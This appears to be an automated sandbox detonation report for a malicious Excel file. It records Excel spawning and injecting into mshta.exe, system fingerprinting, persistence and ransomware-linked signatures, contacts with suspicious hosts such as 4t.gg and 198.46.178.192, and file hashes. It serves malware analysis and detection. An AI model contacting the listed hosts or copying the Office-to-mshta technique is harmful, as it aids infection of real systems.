SHA512 73befb8642d5c9828c6d67bcbcb4b6128410c07e2abbef7ae65a3fa4fc067ee50e7c9c81cf1e2f2b56ddd8cbfa94f20bf56ce3e8848d7a9403a14c8de6d22742

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 02:22

Reported

2024-11-13 02:24

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4dc101b0b6fe54eb411577729f39253ad9a33cad9f0eca212ea4f3d786881ba4.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4540 wrote to memory of 4336 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 4540 wrote to memory of 4336 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4dc101b0b6fe54eb411577729f39253ad9a33cad9f0eca212ea4f3d786881ba4.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 198.46.178.192:80 198.46.178.192 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 192.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/4540-2-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4540-3-0x00007FFCED6ED000-0x00007FFCED6EE000-memory.dmp

memory/4540-4-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4540-8-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-7-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-6-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-5-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4540-1-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4540-0-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4540-9-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-13-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-14-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-12-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-11-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-10-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-15-0x00007FFCAB180000-0x00007FFCAB190000-memory.dmp

memory/4540-16-0x00007FFCAB180000-0x00007FFCAB190000-memory.dmp

memory/4336-34-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4336-39-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4540-41-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4336-45-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4336-46-0x00007FF7591A0000-0x00007FF7591A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 6e718036cf14ba93c97397e55f4b36df
SHA1 678980f6fc680782b3add2b9d3ed8308392a4863
SHA256 e29eace8f18e70b626430a2fd436b9c22d919142ca6fa4e2e91c79e9ad050f90
SHA512 577bca2f9b6379de2541bfe84f980392a6e2d664c47c0b08c864897bfc10b1e18b2eb98241469189d48d9ef8f6748a1be538a538f7861fc62b6d70ecad174da1